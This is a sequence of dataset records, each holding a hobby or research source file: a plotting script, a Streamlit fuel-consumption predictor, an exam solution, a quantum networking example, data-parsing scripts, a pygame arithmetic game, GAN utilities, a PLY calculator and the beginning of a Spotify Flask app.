alg, data, str(gs)]) + \".log\")\n df_times[xticklabels[i]], df_accs[xticklabels[i]] = [], []\n # Read the log file to get bs_times, bs_accs: dims=100\n if not os.path.exists(file_path):\n flag = True\n break\n with open(file_path) as f:\n for line in f:\n match_line = re.match(r\"Batch:.*best_test_acc: (.*), cur_use_time: (.*)s\", line)\n if match_line:\n df_accs[xticklabels[i]].append(float(match_line.group(1)))\n df_times[xticklabels[i]].append(float(match_line.group(2)))\n if len(df_times[xticklabels[i]]) != 100:\n flag = True\n break\n\n if flag: continue\n\n # Get the FULL-batch results\n file_path = os.path.join(\"batch_acc_cum_fix_batch\", '_'.join([mode, alg, data]) + \"_full.log\")\n # Read the log file to get bs_times, bs_accs: dims=100\n with open(file_path) as f:\n df_times['FULL'], df_accs['FULL'] = [], []\n for line in f:\n match_line = re.match(r\"Batch:.*best_test_acc: (.*), cur_use_time: (.*)s\", line)\n if match_line:\n df_accs['FULL'].append(float(match_line.group(1)))\n df_times['FULL'].append(float(match_line.group(2)))\n\n # Plot accuracy versus elapsed time\n fig, ax = plt.subplots()\n ax.set_ylabel('Accuracy')\n ax.set_xlabel(\"use time(s)\")\n \n category_colors = plt.get_cmap('RdYlGn')(\n np.linspace(0.15, 0.85, len(xticklabels))) \n \n for key, c in zip(xticklabels, category_colors):\n ax.plot(df_times[key], df_accs[key], color=c, label=key)\n \n ax.legend()\n fig.tight_layout() # prevent overlap\n fig.savefig(dir_out + \"/\" + data + \"/\" + alg + \"_\" + mode + \"_accs_times.png\")\n plt.close() \n \n\n ","repo_name":"AugF/pyg-gnns","sub_path":"paper_exp6_sampling_acc/handle_sampling_acc_fix_epoch.py","file_name":"handle_sampling_acc_fix_epoch.py","file_ext":"py","file_size_in_byte":4844,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"5202810093","text":"import streamlit as st\r\nimport pickle\r\nimport numpy as np\r\nfrom PIL import Image\r\nimage = Image.open('FuelPredx_logo.jpg')\r\n\r\ndef load_model():\r\n    with open('saved_steps.pkl', 'rb') as file:\r\n        data = pickle.load(file)\r\n    return data\r\n\r\n\r\ndata = load_model()\r\n\r\nregressor = data[\"model\"]\r\n\r\n\r\ndef show_predict_page():\r\n    st.title(\"FuelPredx : Software for Tractor Fuel Consumption Prediction\")\r\n    st.sidebar.image(image, use_column_width=True)\r\n    st.write(\"\"\"### We need some information to predict the Fuel Consumption\"\"\")\r\n\r\n    Tractor_PTO = st.number_input('Enter PTO Power (kW)')\r\n    Engine_Speed = st.number_input('Enter Engine Speed (RPM)')\r\n    Speed_Depression = st.number_input('Enter Speed Depression (RPM)')\r\n\r\n    ok = st.button(\"Calculate Fuel Consumption\")\r\n    if ok:\r\n        X = np.array([[Tractor_PTO, Engine_Speed, Speed_Depression]])\r\n        X = X.astype(float)\r\n\r\n        fuel_consumption = regressor.predict(X)\r\n        st.subheader(f\"The estimated Fuel Consumption(L/h) is {fuel_consumption[0]:.2f}\")\r\n\r\n\r\n\r\n","repo_name":"Ambuj-coder1997/FUEL-CONSUMPTION_XGBOOST","sub_path":"predict_page.py","file_name":"predict_page.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34777199940","text":"with open('../Dane_2203/liczby.txt') as f:\n    liczby = [[int(j) for j in i.split()] for i in f.readlines()]\n\n\ndef prime(n):\n    if n < 2: return False\n    if n < 4: return True\n    for i in range(2, n // 2 + 1):\n        if n % i == 0:\n            return False\n    return True\n\ndef nwd(a, b):\n    while a != b:\n        if a > b:\n            a -= b\n        else:\n            b -= a\n    return a\n\n\ndef potega(a, x, M = None):\n    if x == 0:\n    \treturn 1\n    if x % 2 == 0:\n    \ttmp = 
potega(a, x // 2, M)\n \treturn (tmp * tmp) % M\n if x % 2 == 1:\n \ttmp = potega(a, (x - 1) // 2, M)\n \treturn (a * tmp * tmp) % M\n\n\ncount = 0\nfor l in liczby:\n M = l[0]\n if prime(M):\n count += 1\n\nprint(count)\n\n\ncount = 0\nfor l in liczby:\n M = l[0]\n a = l[1]\n if nwd(M, a) == 1:\n count += 1\n\nprint(count)\n\n\ncount = 0\nfor l in liczby:\n M, a, b = l\n\n for x in range(0, M):\n if potega(a, x, M) == b:\n count += 1\n break\n\nprint(count)\n","repo_name":"loudsheep/matura","sub_path":"informatyka/przykładowy_2023/zad3/rozw.py","file_name":"rozw.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27322330391","text":"import sys\nimport json\nfrom cqc.pythonLib import CQCConnection\n\n\ndef main(nr_runs):\n    meas_outcomes = {}\n\n    # Initialize the connection\n    with CQCConnection(\"Bob\") as Bob:\n\n        for _ in range(nr_runs):\n\n            # Create an EPR pair\n            q = Bob.recvEPR()\n\n            # Get the identifier of this EPR pair such that Alice can relate the measurement outcomes to hers\n            sequence_nr = q.get_entInfo().id_AB\n\n            if (sequence_nr % 3) == 0:\n                # Measure in Z\n                pass\n            elif (sequence_nr % 3) == 1:\n                # Measure in X\n                q.H()\n            else:\n                # Measure in Y\n                q.K()\n\n            m = q.measure()\n            meas_outcomes[sequence_nr] = m\n\n    # Encode the measurement outcomes to bytes, such that we can send them\n    msg = json.dumps(meas_outcomes).encode(\"utf-8\")\n\n    # Send the measurement outcomes to Alice\n    Bob.sendClassical(name=\"Alice\", msg=msg)\n\n\nif __name__ == \"__main__\":\n    try:\n        nr_runs = int(sys.argv[1])\n    except Exception:\n        nr_runs = 500\n    if nr_runs > 1000:\n        raise ValueError(\"Number of EPR pairs for this example is currently restricted to less than 1000\")\n    main(nr_runs)\n","repo_name":"SoftwareQuTech/CQC-Python","sub_path":"examples/pythonLib/QBER/bobTest.py","file_name":"bobTest.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"21"} +{"seq_id":"18332759273","text":"from app.config import project_id\nimport json\n\n\ndef publish_topic(topic, message):\n    from google.cloud import pubsub_v1\n\n    publisher = pubsub_v1.PublisherClient()\n    topic_path = publisher.topic_path(project_id, topic)\n    message_data = json.dumps(message).encode('utf-8')\n    future = publisher.publish(topic_path, data=message_data)\n    future.result()\n    print(f'Published Pub/Sub topic {topic} with message: {json.dumps(message)}')\n","repo_name":"Heonozis/gcp-serverless-python","sub_path":"app/common/lib/publish_topic.py","file_name":"publish_topic.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42839210816","text":"import json\n\nimport xmltodict\n\nsra_file = open('input/gisaid-sra.xml')\n\nlines_to_keep = []\nsets_kept = 0\ntag_counter = 0\ntag = 'EXPERIMENT_PACKAGE'\nin_tag = False\nprocess_chunk = False\nfor line in sra_file:\n    if '<%s>' % tag in line:\n        in_tag = True\n        tag_counter += 1\n    if in_tag:\n        lines_to_keep.append(line)\n    if '</%s>' % tag in line:\n        in_tag = False\n        tag_counter -= 1\n        if tag_counter == 0:\n            process_chunk = True\n    if process_chunk:\n        process_chunk = False\n        xml = ''.join(lines_to_keep)\n        xml_filename = 'output/sra-parsing/set-%d.xml' % sets_kept\n        with open(xml_filename, 'w') as xml_file:\n            xml_file.write(xml)\n        json_filename = 'output/sra-parsing/set-%d.json' % sets_kept\n        with open(json_filename, 'w') as 
json_file:\n as_dict = xmltodict.parse(xml)\n json_file.write(json.dumps(as_dict))\n sets_kept += 1\n print('Wrote %d lines to %s...' % (len(lines_to_keep), json_filename))\n tag_counter = 0\n lines_to_keep = []\nsra_file.close()\n","repo_name":"veg/biosampleMeta","sub_path":"scripts/gisaid-sra-scrape.py","file_name":"gisaid-sra-scrape.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16257704126","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Feb 16 23:00:50 2022\n\n@author: aiatul\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn import svm\n\ndataset = pd.read_csv(\"diabetes.csv\")\n\nX = dataset.drop(columns = 'Outcome', axis=1)\nY = dataset['Outcome']\nscaler = StandardScaler()\nscaler.fit(X)\nstandardized_data = scaler.transform(X)\nx = standardized_data\ny = dataset['Outcome']\n\nx_train, x_test, y_train, y_test = train_test_split(x,y, test_size = 0.2, stratify=y, random_state=2)\n\nclassifier = svm.SVC(kernel='linear')\nclassifier.fit(x_train,y_train)\nx_train_prediction = classifier.predict(x_train)\ntraining_data_accuracy = accuracy_score(x_train_prediction, y_train)\nprint('Accuracy score of the training data : ', training_data_accuracy)\n\n\n# accuracy score on the test data\nx_test_prediction = classifier.predict(x_test)\ntest_data_accuracy = accuracy_score(x_test_prediction, y_test)\n\nprint('Accuracy score of the test data : ', test_data_accuracy)\n\ninput_data = (5,166,72,19,175,25.8,0.587,51)\n\n# changing the input_data to numpy array\ninput_data_as_numpy_array = np.asarray(input_data)\n\n# reshape the array as we are predicting for one instance\ninput_data_reshaped = input_data_as_numpy_array.reshape(1,-1)\n\n# standardize the input data\nstd_data = scaler.transform(input_data_reshaped)\nprint(std_data)\n\nprediction = classifier.predict(std_data)\nprint(prediction)\n\nif prediction[0] == 0:\n    print('The person is not diabetic')\nelse:\n    print('The person is diabetic')\n","repo_name":"Arnab1899/Diabetics-Prediction-using-Machine-Learning","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41624447163","text":"import h5py\nimport pandas as pd\nimport numpy as np\nfrom src.utility.get_APDM_files import get_APDM_ContAlgo_files_AWS\n\nimport sys\nsys.path.insert(1, '/Users/bluesky/Documents/GitHub/STEPP/src/') #path where the file is downloaded\nfrom helpers import *\n\ndef get_ContAlgo_strides(data):\n    steps = []\n    steps = data['Bouts']['gaitIndices'].value\n    l, w = steps.shape\n    max_strides = steps[l-1][w-1]\n    total_strides = (max_strides + 1)*2\n\n    return total_strides\n\n\ndef process_APDM_Cont_Algo(data):\n    #Bouts: - Use these bout times (from James McNames)\n    #data['Bouts'].keys()\n\n    #Metrics - Gait\n    gait_data = data['Metrics']['Gait']['Feet']\n    results = []\n    metrics = []\n    for key in gait_data.keys():\n        validity = pd.DataFrame(gait_data[key]['validity'].value)\n        values = pd.DataFrame(gait_data[key]['values'].value)\n\n        validity.columns = 
['valL', 'valR']\n values.columns = ['valuesL', 'valuesR']\n #joint_df = pd.concat([validity, values], axis = 1)\n #results.append({'metric': key,\n # 'median_value': np.nanmedian(values)})\n\n metrics.append(key)\n results.append(np.nanmedian(values))\n turns_data = data['Metrics']['Turns']['Lumbar']\n for key in turns_data.keys():\n try:\n validity = pd.DataFrame(turns_data[key]['validity'].value)\n values = pd.DataFrame(turns_data[key]['values'].value)\n\n #results.append({'metric': 'Turns-' + key,\n # 'median_value': np.nanmedian(values)})\n metrics.append(key)\n results.append(np.nanmedian(values))\n except ValueError:\n datetimes = data['Metrics']['Turns']['Lumbar'][key].value\n\n obj = pd.DataFrame([results])\n obj.columns = metrics\n\n obj['total_strides'] = get_ContAlgo_strides(data)\n\n return obj\n\nif __name__ == '__main__':\n get_APDM_ContAlgo_files_AWS()\n #file = '/Users/bluesky/Downloads/X9001262_A_10010001_01_OPAL_20minWalk_Continuous_Analysis.h5'\n #data = h5py.File(file, 'r')\n APDM_files = get_APDM_ContAlgo_files_AWS()\n results = []\n for index, row in APDM_files.iterrows():\n data = read_file_aws(row.S3_obj.bucket_name, row.S3_obj.key, '.h5')\n try:\n results_df = process_APDM_Cont_Algo(data)\n except KeyError:\n continue\n new_obj = {'subject': row.subject,\n 'visit': row.visit,\n 'task': row.task}\n res_obj = pd.concat([pd.DataFrame([new_obj]), results_df], axis=1)\n results.append(res_obj)\n\n res_df = pd.concat(results)\n res_df.to_csv('/Users/bluesky/Documents/X9001262/Data_Science/X9001262_APDM_ContAlgo_Medians.csv', index = False)\n","repo_name":"stjordanis/dmtiDevices","sub_path":"apdm/apdmContinuousAlgo.py","file_name":"apdmContinuousAlgo.py","file_ext":"py","file_size_in_byte":2724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1738515031","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('artbot_website', '0012_event_add_title_raw'),\n    ]\n\n    operations = [\n        migrations.AlterUniqueTogether(\n            name='event',\n            unique_together=set([('venue', 'title_raw')]),\n        ),\n        migrations.RemoveField(\n            model_name='event',\n            name='titleRaw',\n        ),\n    ]\n","repo_name":"coreymcdermott/artbot","sub_path":"artbot_website/migrations/0013_event_remove_event_titleRaw.py","file_name":"0013_event_remove_event_titleRaw.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"20969072169","text":"#!/usr/bin/env python\n\n\"\"\"\nA basketball game\n\"\"\"\n\n\nVERSION = '0.1'\n\ntry:\n    import sys, random, math, os, getopt\n    import pygame\n    from socket import *\n    from pygame.locals import *\n    import sqlalchemy as sa\n    from sqlalchemy.orm import sessionmaker\n\n    from oldlib.scene import Scene\n    from oldlib.game import GameBase\n    from oldlib.utils import *\n    from lib.operation import OperationType\n    from lib.arithmetic import ArithmeticFactory\n    from lib.question import QuestionStatus, Question, ArithQuestion\n    from lib.exam import Exam\n    from lib.sound import Sound\n    from lib.image import Image\n    from lib.voicer import Voicer\n\n    # from model import Base\n    # from model.user_model import UserModel\n    # from model.setting_model import SettingModel\n    # from model.question_model import QuestionModel\n    from lib.basketball import BasketBall\n\nexcept ImportError as e:\n    print(f'Failed to load module: {e}')\n    
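    # bail out with exit code 2 when a required module is missing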
sys.exit(2)\n\n\n\nclass TitleScene(Scene):\n def __init__(self, id='title_scene', name='Title Scene', bg_color=(0,0,0), bg_image=None, bg_music=None):\n # self.tts_engine = None\n self.voicer = None\n super().__init__(id=id, name=name, bg_color=bg_color, bg_image=bg_image, bg_music=bg_music)\n\n \n def _pre_enter(self, **kwarg):\n super()._pre_enter(**kwarg)\n self.voicer.sayTTS(\"Hello, Ada. How are you!\")\n \n\n def draw(self, screen):\n # screen.fill(DEFAULT_BACKGROUND)\n WIDTH, HEIGHT = screen.get_size()\n draw_text(screen, \"GET READY\", 50, WHITE, WIDTH / 2, HEIGHT / 2, align=\"center\")\n draw_text(screen, \"press SPACE to start\", 20, WHITE, WIDTH / 2, HEIGHT * 3 / 4, align=\"center\")\n draw_text(screen, \"press M for menu\", 20, WHITE, WIDTH / 2, HEIGHT * 3 / 4 + 50, align=\"center\")\n\n\nclass ArithExam(Exam):\n def __init__(self):\n self.operation = OperationType()\n self.arithmeticFactory = ArithmeticFactory()\n \n super().__init__()\n\n def add(self, question):\n if question.status != QuestionStatus.COMPLETED:\n self.incompleted_questions[question.id] = question\n self.completed_questions.pop(question.id, None)\n else:\n self.completed_questions[question.id] = question\n self.incompleted_questions.pop(question.id, None)\n\n def load(self):\n self.number += 1\n for i in range(0, 9):\n arithmetic = self.arithmeticFactory.buildAritmetic(self.operation)\n question = ArithQuestion(f'arith_{i}', i, arithmetic)\n self.add(question)\n \n \n\n def next(self):\n if self.question != None:\n self.add(self.question)\n self.question = None\n\n if self.is_completed == False:\n self.question = self.incompleted_questions[sorted(self.incompleted_questions.keys())[0]]\n return self.question\n \n @property\n def is_completed(self):\n return len(self.incompleted_questions.keys()) == 0 and self.question == None \n\n \n def draw(self, screen):\n # screen.fill(DEFAULT_BACKGROUND)\n WIDTH, HEIGHT = screen.get_size()\n left_tab_x = WIDTH/10\n left_tab_y = HEIGHT*2/5\n\n \n exam_number = f'Exam : {self.number}'\n draw_text(screen, exam_number, 30, GREEN, left_tab_x, left_tab_y, align='center')\n left_tab_y += 35\n\n exam_total = f'Total : {self.total_count}'\n draw_text(screen, exam_total, 30, GREEN, left_tab_x, left_tab_y, align='center')\n left_tab_y += 35\n\n exam_complete = f'Complete : {self.complete_count}'\n draw_text(screen, exam_complete, 30, GREEN, left_tab_x, left_tab_y, align='center')\n left_tab_y += 35\n\n exam_remains = f'Remain : {self.incomplete_count}'\n draw_text(screen, exam_remains, 30, GREEN, left_tab_x, left_tab_y, align='center')\n left_tab_y += 35\n\n exam_correct = f'Correct : {self.result_count(True)}'\n draw_text(screen, exam_correct, 30, GREEN, left_tab_x, left_tab_y, align='center')\n left_tab_y += 35\n\n exam_wrong = f'Wrong : {self.result_count(False)}'\n draw_text(screen, exam_wrong, 30, RED, left_tab_x, left_tab_y, align='center')\n left_tab_y += 35\n\n question_status = f'{self.question.status}'\n draw_text(screen, question_status, 20, GREEN, left_tab_x, left_tab_y, align='center') \n\n question_tab_x = WIDTH//2\n question_tab_y = HEIGHT/6\n\n draw_text(screen, f'Please Input the Result', 50, WHITE, question_tab_x , question_tab_y, align='center')\n question_tab_y += 60\n \n question_number = f'Question : {self.question.number}'\n draw_text(screen, question_number, 30, WHITE, question_tab_x , question_tab_y, align='center')\n question_tab_y += 100\n\n draw_text(screen, f'{self.question}', 150, WHITE, question_tab_x, question_tab_y, align=\"center\")\n question_tab_y += 
180\n\n question_color = WHITE if self.question.result == None else RED if self.question.result == False else GREEN \n draw_text(screen, f'{self.question.answer}', 200, question_color, question_tab_x, question_tab_y, align=\"center\")\n question_tab_y += 210\n\n draw_text(screen, \"press Q to end\", 20, WHITE, question_tab_x, HEIGHT * 3 / 4, align=\"center\")\n \n \n\nclass ArithScene(Scene):\n def __init__(self, id='arith_scene', name='Arith Scene', bg_color=(0,0,0), bg_image=None, bg_music=None):\n self.exam = ArithExam()\n self.exam.load()\n self.question = self.exam.next()\n # self.tts_engine = None\n self.voicer = None\n self.right_image = None\n self.wrong_image = None\n \n super().__init__(id=id, name=name, bg_color=bg_color, bg_image=bg_image, bg_music=bg_music)\n\n def draw(self, screen):\n self.exam.draw(screen)\n\n self.basketball.draw(screen)\n\n if self.question.status == QuestionStatus.GRADED and self.question.result != None:\n if self.question.result == True:\n img_rect = self.right_image.get_rect()\n img_rect.center = (800, 450)\n screen.blit(self.right_image, img_rect)\n else:\n img_rect = self.wrong_image.get_rect()\n img_rect.center = (800, 450)\n screen.blit(self.wrong_image, img_rect)\n \n\n def _handle_scene_event(self, event):\n if self.question != None:\n if self.question.status == QuestionStatus.STARTED:\n if event.type == KEYUP and event.key in [K_0, K_1, K_2, K_3, K_4, K_5, K_6, K_7, K_8, K_9]:\n key = event.key - 48\n self.question.answering(key)\n elif self.question.status == QuestionStatus.ANSWERED:\n if event.type == KEYUP:\n if event.key == K_RETURN:\n self.question.submit()\n if self.question.result == True:\n self.voicer.sayTTS(\"Well done!\")\n else:\n self.voicer.sayTTS(\"Sorry!\")\n elif event.key in [K_0, K_1, K_2, K_3, K_4, K_5, K_6, K_7, K_8, K_9]:\n key = event.key - 48\n value = self.question.answer*10 + key\n self.question.answering(value)\n elif event.key == K_ESCAPE:\n self.question.answering(0)\n\n elif self.question.status == QuestionStatus.GRADED:\n if event.type == KEYUP and event.key in [K_RIGHT, K_SPACE, K_RETURN]:\n self.question.complete()\n self.exam.add(self.question)\n self.question = None\n elif self.question.status == QuestionStatus.COMPLETED:\n if event.type == KEYUP and event.key in [K_RIGHT, K_SPACE, K_RETURN]:\n key = event.key - 48\n self.question = self.exam.next()\n\n return super()._handle_scene_event(event)\n\n\n def update(self):\n if (self.question == None) or self.question.status == QuestionStatus.COMPLETED:\n if self.exam.is_completed == False:\n self.question = self.exam.next()\n if self.question == None:\n if self.exam.operation.type == OperationType.ADD:\n self.exam.operation = OperationType(OperationType.SUB)\n else:\n self.exam.operation = OperationType(OperationType.ADD)\n self.exam.load()\n self.question = self.exam.next()\n\n if self.question.status == QuestionStatus.INITED:\n self.question.start()\n self.voicer.saySimple(f'{self.question}')\n \n self.basketball.update()\n return super().update()\n\n\nclass MenuScene(Scene):\n def __init__(self, id='menu_scene', name='Menu Scene', bg_color=(0,0,0), bg_image=None, bg_music=None):\n self.voicer = None\n super().__init__(id=id, name=name, bg_color=bg_color, bg_image=bg_image, bg_music=bg_music)\n\n\n def draw(self, screen):\n # screen.fill(DEFAULT_BACKGROUND)\n WIDTH, HEIGHT = screen.get_size()\n draw_text(screen, \"SETTINGS\", 50, WHITE, WIDTH / 2, HEIGHT / 2, align=\"center\")\n draw_text(screen, \"press ESC to return\", 20, WHITE, WIDTH / 2, HEIGHT * 3 / 4, 
align=\"center\")\n\n\nclass EndScene(Scene):\n def __init__(self, id='end_scene', name='End Scene', bg_color=(0,0,0), bg_image=None, bg_music=None):\n self.voicer = None\n super().__init__(id=id, name=name, bg_color=bg_color, bg_image=bg_image, bg_music=bg_music)\n\n\n def _handle_scene_event(self, event):\n super()._handle_scene_event(event)\n if event.type == KEYDOWN and event.key == K_q:\n self.voicer.sayTTS(\"Goodbye Ada, my honor to see next time\")\n self.end()\n self.voicer.end()\n sys.exit(0)\n\n\n def draw(self, screen):\n # screen.fill(DEFAULT_BACKGROUND)\n WIDTH, HEIGHT = screen.get_size()\n draw_text(screen, \"GAME OVER\", 50, WHITE, WIDTH / 2, HEIGHT / 2, align=\"center\")\n draw_text(screen, \"press R to restart\", 20, WHITE, WIDTH / 2, HEIGHT * 3 / 4, align=\"center\")\n draw_text(screen, \"press Q to exit\", 20, WHITE, WIDTH / 2, HEIGHT * 3 / 4 + 30, align=\"center\")\n\n\nclass ArithGame(GameBase):\n\n def _init_db(self):\n db_engine = sa.create_engine(f'sqlite:///{os.path.join(self.main_dir, \"data/adarith.db?check_same_thread=False\")}', echo=True)\n Base.metadata.create_all(db_engine)\n db_session = sessionmaker(bind=db_engine)\n self.db_session = db_session()\n UserModel.init_user(self.db_session)\n SettingModel.init_setting(self.db_session)\n QuestionModel.init_question(self.db_session)\n\n \n def _init_res(self):\n super()._init_res()\n self.key_sound = Sound(os.path.join(self.sound_dir, 'pew.wav'))\n self.bg_image = Image(os.path.join(self.image_dir, 'blackboard_1024_768.png')).image\n self.right_image = Image(os.path.join(self.image_dir, 'right_140_147.png')).image\n self.wrong_image = Image(os.path.join(self.image_dir, 'wrong_140_177.png')).image\n ball_path = os.path.join(self.image_dir, 'basketball_50_50.png') \n speed = 13\n rand = ((0.1 * (random.randint(5, 8))))\n vector = (0.47, speed)\n basketball = BasketBall(path=ball_path, vector=vector)\n self.basketball = pygame.sprite.RenderPlain(basketball)\n # self._init_db()\n\n self.voicer_name = 'ada'\n self.voice_path = os.path.join(self.sound_dir, self.voicer_name)\n self.voicer = Voicer(path = self.voice_path)\n\n \n\n def _init_scenes(self):\n happyTune = os.path.join(self.sound_dir, 'Happy Tune.ogg')\n titleScene = TitleScene(bg_music=happyTune)\n # titleScene.tts_engine = self.engine\n titleScene.voicer = self.voicer\n\n arithScene = ArithScene(bg_music=happyTune)\n # arithScene.tts_engine = self.engine\n arithScene.voicer = self.voicer\n arithScene.right_image = self.right_image\n arithScene.wrong_image = self.wrong_image\n arithScene.basketball = self.basketball\n\n menuScene = MenuScene(bg_music=happyTune)\n menuScene.voicer = self.voicer\n\n yippee = os.path.join(self.sound_dir, 'Yippee.ogg')\n endScene = EndScene(bg_music=yippee)\n endScene.voicer = self.voicer\n\n titleScene.add_next(K_ESCAPE, endScene).add_next(K_m, menuScene).add_next(K_SPACE, arithScene)\n menuScene.add_next(K_ESCAPE, titleScene)\n arithScene.add_next(K_q, endScene)\n endScene.add_next(K_r, titleScene)\n\n self.scene = titleScene\n \n return super()._init_scenes()\n\n\n def _pre_run(self, **kwargs):\n super()._pre_run(**kwargs)\n self.scene.switch_to(self.scene)\n\n\n\n ","repo_name":"webji/adarith","sub_path":"adarith/arithgame.py","file_name":"arithgame.py","file_ext":"py","file_size_in_byte":12943,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"41728434318","text":"import numpy as np\nimport tensorflow as tf\nimport os\n\nfrom scipy import misc\nfrom PIL import 
Image\n\ndef _bytes_feature(value):\n return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))\n\ndef _int64_feature(value):\n return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))\n\ndef create_tfrecord(tfrecords_filename, jpg_files):\n print(\"Creating TF Record\")\n writer = tf.python_io.TFRecordWriter(tfrecords_filename)\n\n for img_file in jpg_files:\n img = np.array(Image.open(img_file))\n\n height = img.shape[0]\n width = img.shape[1]\n img_raw = img.tostring()\n\n example = tf.train.Example(features=tf.train.Features(feature={\n 'height': _int64_feature(height),\n 'width': _int64_feature(width),\n 'image_raw': _bytes_feature(img_raw)}))\n\n writer.write(example.SerializeToString())\n\n writer.close()\n\ndef read_and_decode(filename_queue, FLAGS):\n reader = tf.TFRecordReader()\n\n _, serialized_example = reader.read(filename_queue)\n\n features = tf.parse_single_example(\n serialized_example,\n features={\n 'height': tf.FixedLenFeature([], tf.int64),\n 'width': tf.FixedLenFeature([], tf.int64),\n 'image_raw': tf.FixedLenFeature([], tf.string),\n })\n\n image = tf.decode_raw(features['image_raw'], tf.uint8)\n height = tf.cast(features['height'], tf.int32)\n width = tf.cast(features['width'], tf.int32)\n\n image_shape = tf.stack([height, width, 3])\n image = tf.reshape(image, image_shape)\n resized_image = tf.image.resize_image_with_crop_or_pad(image=image,\n target_height=FLAGS.img_size,\n target_width=FLAGS.img_size)\n\n images = tf.train.shuffle_batch([resized_image],\n batch_size=FLAGS.fixed_batch_size,\n capacity=FLAGS.capacity,\n num_threads=FLAGS.num_threads,\n min_after_dequeue=FLAGS.min_after_dequeue)\n # Normalize\n images = tf.cast(images, tf.float32)\n images = tf.subtract(tf.truediv(images, 127.5), 1)\n return images\n\ndef immerge_save(images, epoch, img_size, path_dir):\n images = np.array(images).squeeze()\n h, w, c = images.shape[1], images.shape[2], images.shape[3]\n\n filename = os.path.join(path_dir, '{:d}.jpg'.format(epoch))\n img = np.zeros((h * img_size, w * img_size, c))\n\n for idx, image in enumerate(images):\n i = idx % img_size\n j = idx // img_size\n img[j * h:j * h + h, i * w:i * w + w, ...] = image\n\n img = (img + 1.) / 2\n\n return misc.imsave(filename, img)\n","repo_name":"zxcvbnmditto/GAN","sub_path":"vanilla_gan/new_utils.py","file_name":"new_utils.py","file_ext":"py","file_size_in_byte":2820,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"10437477384","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\ncalc.py\n\nThis file uses the lex and yacc scripts implemented in the PLY library (Python \nLex-Yacc). All the functions defined in the file are rules for tokenizing and\nparsing. 
The docstrings of the functions are also parsed as the grammar rules.\n\"\"\"\n\nfrom ply import lex, yacc\n\n# tokens supported by the script\ntokens = (\n \"NUMBER\",\n \"PLUS\",\n \"MINUS\",\n \"TIMES\",\n \"DIVIDE\",\n \"LPAREN\",\n \"RPAREN\",\n)\n\n# rule for parsing a NUMBER token\ndef t_NUMBER(t):\n r\"\\d+\"\n t.value = int(t.value)\n return t\n\n\n# rules for parsing the operator tokens and the parenthesis\nt_PLUS = r\"\\+\"\nt_MINUS = r\"-\"\nt_TIMES = r\"\\*\"\nt_DIVIDE = r\"/\"\nt_LPAREN = r\"\\(\"\nt_RPAREN = r\"\\)\"\n\n# ignored characters\nt_ignore = \" \"\n\n# precedence rules for the arithmetic operators\nprecedence = (\n (\"left\", \"PLUS\", \"MINUS\"),\n (\"left\", \"TIMES\", \"DIVIDE\"),\n (\"right\", \"UMINUS\"),\n)\n\n# exit on token errors\ndef t_error(t):\n exit(t)\n\n\n# grammar for EXPR\ndef p_statement_expr(p):\n \"statement : expression\"\n print(p[1])\n\n\n# grammar for binary arithmetic operators\ndef p_expression_binop(p):\n \"\"\"expression : expression PLUS expression\n | expression MINUS expression\n | expression TIMES expression\n | expression DIVIDE expression\"\"\"\n if p[2] == \"+\":\n p[0] = p[1] + p[3]\n elif p[2] == \"-\":\n p[0] = p[1] - p[3]\n elif p[2] == \"*\":\n p[0] = p[1] * p[3]\n elif p[2] == \"/\":\n p[0] = p[1] / p[3]\n\n\n# grammar for UNARY MINUS\ndef p_expression_uminus(p):\n \"expression : MINUS expression %prec UMINUS\"\n p[0] = -p[2]\n\n\n# grammar for EXPR between LPAREN and RPAREN\ndef p_expression_group(p):\n \"expression : LPAREN expression RPAREN\"\n p[0] = p[2]\n\n\n# grammar for NUMBER\ndef p_expression_number(p):\n \"expression : NUMBER\"\n p[0] = p[1]\n\n\n# exit on grammar errors\ndef p_error(p):\n exit(p)\n\n\n# build the lexer\nlex.lex()\nyacc.yacc()\n\n# parse an example input string\nyacc.parse(\"-1 + (2 * 3 + 4) * -5\")\n","repo_name":"ribbas/grad_courses","sub_path":"629_programming_languages/assn/02/calc.py","file_name":"calc.py","file_ext":"py","file_size_in_byte":1998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22332095346","text":"import spotipy\nfrom spotipy.oauth2 import SpotifyOAuth\nfrom flask import Flask, request, url_for, session, redirect, render_template\nimport json\nimport time, datetime\nimport os\nimport random\nfrom spotifysecrets import likedID, likedSecret\n\napp = Flask(__name__)\n\napp.secret_key = 